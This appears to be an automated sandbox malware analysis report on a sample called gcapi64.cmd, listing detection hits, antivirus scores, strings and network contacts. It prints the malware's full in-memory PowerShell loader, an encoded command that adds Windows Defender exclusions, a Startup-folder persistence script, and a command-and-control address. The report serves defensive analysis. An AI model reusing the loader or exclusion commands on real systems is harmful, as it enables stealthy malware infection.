""C:\Users\user\Desktop\gcapi64.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7444, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\user\Desktop\gcapi64.cmd.Kwj -WindowStyle hidden -command "$Tcvpdxwib = get-content 'C:\Users\user\Desktop\gcapi64.cmd' | Select-Object -Last 1; $Eyuktr = [System.Convert]::FromBase64String($Tcvpdxwib);$Qtrqzlhpxt = New-Object System.IO.MemoryStream( , $Eyuktr );$Ibywdtdu = New-Object System.IO.MemoryStream;$Reymjtc = New-Object System.IO.Compression.GzipStream $Qtrqzlhpxt, ([IO.Compression.CompressionMode]::Decompress);$Reymjtc.CopyTo( $Ibywdtdu );$Reymjtc.Close();$Qtrqzlhpxt.Close();[byte[]] $Eyuktr = $Ibywdtdu.ToArray();[Array]::Reverse($Eyuktr); $Xxwiev = [System.Threading.Thread]::GetDomain().Load($Eyuktr); $Krabry = $Xxwiev.EntryPoint; [System.Delegate]::CreateDelegate([Action], $Krabry.DeclaringType, $Krabry.Name).DynamicInvoke() | Out-Null", ProcessId: 7544, ProcessName: gcapi64.cmd.Kwj
                    Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
                    Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\gcapi64.cmd.Kwj, ProcessId: 7544, TargetFilename: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ouhvmtyj.kyc.ps1
                    Sigma detected: Suspicious Copy From or To System Directory
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: xcopy /d /q /y /h /i C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\Desktop\gcapi64.cmd.Kwj, CommandLine: xcopy /d /q /y /h /i C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\Desktop\gcapi64.cmd.Kwj, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\xcopy.exe, NewProcessName: C:\Windows\System32\xcopy.exe, OriginalFileName: C:\Windows\System32\xcopy.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\gcapi64.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7444, ParentProcessName: cmd.exe, ProcessCommandLine: xcopy /d /q /y /h /i C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\Desktop\gcapi64.cmd.Kwj, ProcessId: 7504, ProcessName: xcopy.exe
                    Sigma detected: Suspicious Execution of Powershell with Base64
                    Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEQAZQBzAGsAdABvAHAAXABnAGMAYQBwAGkANgA0AC4AYwBtAGQAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABEAGUAcwBrAHQAbwBwAFwAZwBjAGEAcABpADYANAAuAGMAbQBkADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAZwBjAGEAcABpADYANAAuAGMAbQBkADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVQBzAGUAcgBzAFwAagBvAG4AZQBzAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABnAGMAYQBwAGkANgA0AC4AYwBtAGQA, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEQAZQBzAGsAdABvAHAAXABnAGMAYQBwAGkANgA0AC4AYwBtAGQAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABEAGUAcwBrAHQAbwBwAFwAZwBjAGEAcABpADYANAAuAGMAbQBkADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAZwBjAGEAcABpADYANAAuAGMAbQBkADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVQBzAGUAcgBzAFwAagBvAG4AZQBzAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABnAGMAYQBwAGkANgA0AC4AYwBtAGQA, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\gcapi64.cmd.Kwj -WindowStyle hidden -command "$Tcvpdxwib = get-content 'C:\Users\user\Desktop\gcapi64.cmd' | Select-Object -Last 1; $Eyuktr = [System.Convert]::FromBase64String($Tcvpdxwib);$Qtrqzlhpxt = New-Object System.IO.MemoryStream( , $Eyuktr );$Ibywdtdu = New-Object System.IO.MemoryStream;$Reymjtc = New-Object System.IO.Compression.GzipStream $Qtrqzlhpxt, ([IO.Compression.CompressionMode]::Decompress);$Reymjtc.CopyTo( $Ibywdtdu );$Reymjtc.Close();$Qtrqzlhpxt.Close();[byte[]] $Eyuktr = $Ibywdtdu.ToArray();[Array]::Reverse($Eyuktr); $Xxwiev = [System.Threading.Thread]::GetDomain().Load($Eyuktr); $Krabry = $Xxwiev.EntryPoint; [System.Delegate]::CreateDelegate([Action], $Krabry.DeclaringType, $Krabry.Name).DynamicInvoke() | Out-Null", ParentImage: C:\Users\user\Desktop\gcapi64.cmd.Kwj, ParentProcessId: 7544, ParentProcessName: gcapi64.cmd.Kwj, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZ
                    Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gcapi64.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gcapi64.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gcapi64.vbs" , ProcessId: 1852, ProcessName: wscript.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEQAZQBzAGsAdABvAHAAXABnAGMAYQBwAGkANgA0AC4AYwBtAGQAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABEAGUAcwBrAHQAbwBwAFwAZwBjAGEAcABpADYANAAuAGMAbQBkADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAZwBjAGEAcABpADYANAAuAGMAbQBkADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVQBzAGUAcgBzAFwAagBvAG4AZQBzAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABnAGMAYQBwAGkANgA0AC4AYwBtAGQA, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEQAZQBzAGsAdABvAHAAXABnAGMAYQBwAGkANgA0AC4AYwBtAGQAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABEAGUAcwBrAHQAbwBwAFwAZwBjAGEAcABpADYANAAuAGMAbQBkADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAZwBjAGEAcABpADYANAAuAGMAbQBkADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVQBzAGUAcgBzAFwAagBvAG4AZQBzAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABnAGMAYQBwAGkANgA0AC4AYwBtAGQA, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\gcapi64.cmd.Kwj -WindowStyle hidden -command "$Tcvpdxwib = get-content 'C:\Users\user\Desktop\gcapi64.cmd' | Select-Object -Last 1; $Eyuktr = [System.Convert]::FromBase64String($Tcvpdxwib);$Qtrqzlhpxt = New-Object System.IO.MemoryStream( , $Eyuktr );$Ibywdtdu = New-Object System.IO.MemoryStream;$Reymjtc = New-Object System.IO.Compression.GzipStream $Qtrqzlhpxt, ([IO.Compression.CompressionMode]::Decompress);$Reymjtc.CopyTo( $Ibywdtdu );$Reymjtc.Close();$Qtrqzlhpxt.Close();[byte[]] $Eyuktr = $Ibywdtdu.ToArray();[Array]::Reverse($Eyuktr); $Xxwiev = [System.Threading.Thread]::GetDomain().Load($Eyuktr); $Krabry = $Xxwiev.EntryPoint; [System.Delegate]::CreateDelegate([Action], $Krabry.DeclaringType, $Krabry.Name).DynamicInvoke() | Out-Null", ParentImage: C:\Users\user\Desktop\gcapi64.cmd.Kwj, ParentProcessId: 7544, ParentProcessName: gcapi64.cmd.Kwj, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZ

                    Data Obfuscation

                    barindex
                    Sigma detected: Drops script at startup location
                    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\gcapi64.cmd.Kwj, ProcessId: 7544, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gcapi64.vbs

                    Suricata Signatures

                    No Suricata rule has matched

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Multi AV Scanner detection for submitted file
                    Source: gcapi64.cmdVirustotal: Detection: 18%Perma Link
                    Source: gcapi64.cmdReversingLabs: Detection: 13%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\InstallUtil.exe.log
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: gcapi64.cmd.Kwj, 00000005.00000002.1852130887.0000025825B89000.00000004.00000800.00020000.00000000.sdmp, gcapi64.cmd.Kwj, 00000005.00000002.2082739360.000002583DE30000.00000004.08000000.00040000.00000000.sdmp, gcapi64.cmd.Kwj, 00000005.00000002.1996056904.00000258351F4000.00000004.00000800.00020000.00000000.sdmp, gcapi64.cmd.Kwj, 00000005.00000002.1996056904.000002583547D000.00000004.00000800.00020000.00000000.sdmp, gcapi64.cmd.Kwj, 00000014.00000002.2328831469.00000183BCCBA000.00000004.00000800.00020000.00000000.sdmp, gcapi64.cmd.Kwj, 00000014.00000002.2107099890.00000183AC6EC000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: gcapi64.cmd.Kwj, 00000005.00000002.1852130887.0000025825B89000.00000004.00000800.00020000.00000000.sdmp, gcapi64.cmd.Kwj, 00000005.00000002.2082739360.000002583DE30000.00000004.08000000.00040000.00000000.sdmp, gcapi64.cmd.Kwj, 00000005.00000002.1996056904.00000258351F4000.00000004.00000800.00020000.00000000.sdmp, gcapi64.cmd.Kwj, 00000005.00000002.1996056904.000002583547D000.00000004.00000800.00020000.00000000.sdmp, gcapi64.cmd.Kwj, 00000014.00000002.2328831469.00000183BCCBA000.00000004.00000800.00020000.00000000.sdmp, gcapi64.cmd.Kwj, 00000014.00000002.2107099890.00000183AC6EC000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: powershell.pdbUGP source: gcapi64.cmd.Kwj, 00000005.00000000.1656117411.00007FF67B75A000.00000002.00000001.01000000.00000003.sdmp, gcapi64.cmd.Kwj.18.dr, gcapi64.cmd.Kwj.3.dr
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: gcapi64.cmd.Kwj, 00000005.00000002.2065678749.000002583D520000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2944055026.0000016B9956D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2944055026.0000016B995BD000.00000004.00000800.00020000.00000000.sdmp, gcapi64.cmd.Kwj, 00000014.00000002.2328831469.00000183BBC10000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.2426048985.000001C9C5CA2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.2457809990.000001C9D6114000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: gcapi64.cmd.Kwj, 00000005.00000002.2065678749.000002583D520000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2944055026.0000016B9956D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2944055026.0000016B995BD000.00000004.00000800.00020000.00000000.sdmp, gcapi64.cmd.Kwj, 00000014.00000002.2328831469.00000183BBC10000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.2426048985.000001C9C5CA2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.2457809990.000001C9D6114000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: powershell.pdb source: gcapi64.cmd.Kwj, 00000005.00000000.1656117411.00007FF67B75A000.00000002.00000001.01000000.00000003.sdmp, gcapi64.cmd.Kwj.18.dr, gcapi64.cmd.Kwj.3.dr
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                    Source: global trafficTCP traffic: 192.168.2.4:49734 -> 91.92.240.9:39001
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficDNS traffic detected: DNS query: relay-01-static.com
                    Source: powershell.exe, 00000006.00000002.1869718181.000001FD23839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
                    Source: powershell.exe, 00000006.00000002.1869718181.000001FD2387A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
                    Source: powershell.exe, 00000006.00000002.1869718181.000001FD2387A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micft.cMicRosof
                    Source: gcapi64.cmd.Kwj, 00000014.00000002.2480838211.00000183C3D80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                    Source: gcapi64.cmd.Kwj, 00000005.00000002.1996056904.00000258351F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1851432113.000001FD1B4C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 00000006.00000002.1819044968.000001FD0B678000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 00000006.00000002.1819044968.000001FD0B678000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                    Source: gcapi64.cmd.Kwj, 00000005.00000002.1852130887.0000025825181000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1819044968.000001FD0B451000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2929418209.0000016B890F9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2929418209.0000016B88F61000.00000004.00000800.00020000.00000000.sdmp, gcapi64.cmd.Kwj, 00000014.00000002.2107099890.00000183ABB81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000006.00000002.1819044968.000001FD0B678000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                    Source: powershell.exe, 00000006.00000002.1819044968.000001FD0B678000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: gcapi64.cmd.Kwj, 00000005.00000002.1852130887.0000025825181000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1819044968.000001FD0B451000.00000004.00000800.00020000.00000000.sdmp, gcapi64.cmd.Kwj, 00000014.00000002.2107099890.00000183ABB81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                    Source: powershell.exe, 00000006.00000002.1851432113.000001FD1B4C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000006.00000002.1851432113.000001FD1B4C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000006.00000002.1851432113.000001FD1B4C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: powershell.exe, 00000006.00000002.1819044968.000001FD0B678000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: gcapi64.cmd.Kwj, 00000005.00000002.2065678749.000002583D520000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2944055026.0000016B9956D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2944055026.0000016B995BD000.00000004.00000800.00020000.00000000.sdmp, gcapi64.cmd.Kwj, 00000014.00000002.2328831469.00000183BBC10000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.2426048985.000001C9C5CA2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.2457809990.000001C9D6114000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                    Source: gcapi64.cmd.Kwj, 00000005.00000002.2065678749.000002583D520000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2944055026.0000016B9956D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2944055026.0000016B995BD000.00000004.00000800.00020000.00000000.sdmp, gcapi64.cmd.Kwj, 00000014.00000002.2328831469.00000183BBC10000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.2426048985.000001C9C5C4D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.2426048985.000001C9C5CA2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.2457809990.000001C9D6114000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                    Source: gcapi64.cmd.Kwj, 00000005.00000002.2065678749.000002583D520000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2944055026.0000016B9956D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2944055026.0000016B995BD000.00000004.00000800.00020000.00000000.sdmp, gcapi64.cmd.Kwj, 00000014.00000002.2328831469.00000183BBC10000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.2426048985.000001C9C5CA2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.2457809990.000001C9D6114000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                    Source: gcapi64.cmd.Kwj, 00000005.00000002.1996056904.00000258351F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1851432113.000001FD1B4C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: gcapi64.cmd.Kwj, 00000005.00000002.2065678749.000002583D520000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2944055026.0000016B9956D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2944055026.0000016B995BD000.00000004.00000800.00020000.00000000.sdmp, gcapi64.cmd.Kwj, 00000014.00000002.2328831469.00000183BBC10000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.2426048985.000001C9C5CA2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.2457809990.000001C9D6114000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                    Source: gcapi64.cmd.Kwj, 00000005.00000002.1852130887.00000258253A8000.00000004.00000800.00020000.00000000.sdmp, gcapi64.cmd.Kwj, 00000005.00000002.2065678749.000002583D520000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2944055026.0000016B9956D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2929418209.0000016B88F61000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2944055026.0000016B995BD000.00000004.00000800.00020000.00000000.sdmp, gcapi64.cmd.Kwj, 00000014.00000002.2328831469.00000183BBC10000.00000004.00000800.00020000.00000000.sdmp, gcapi64.cmd.Kwj, 00000014.00000002.2107099890.00000183ABDA2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.2426048985.000001C9C5CA2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.2457809990.000001C9D6114000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.2426048985.000001C9C5D4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                    Source: gcapi64.cmd.Kwj, 00000005.00000002.2065678749.000002583D520000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2944055026.0000016B9956D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.2944055026.0000016B995BD000.00000004.00000800.00020000.00000000.sdmp, gcapi64.cmd.Kwj, 00000014.00000002.2328831469.00000183BBC10000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.2457809990.000001C9D6114000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354

                    Spam, unwanted Advertisements and Ransom Demands

                    barindex
                    Reads the Security eventlog
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                    Reads the System eventlog
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShell
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShell
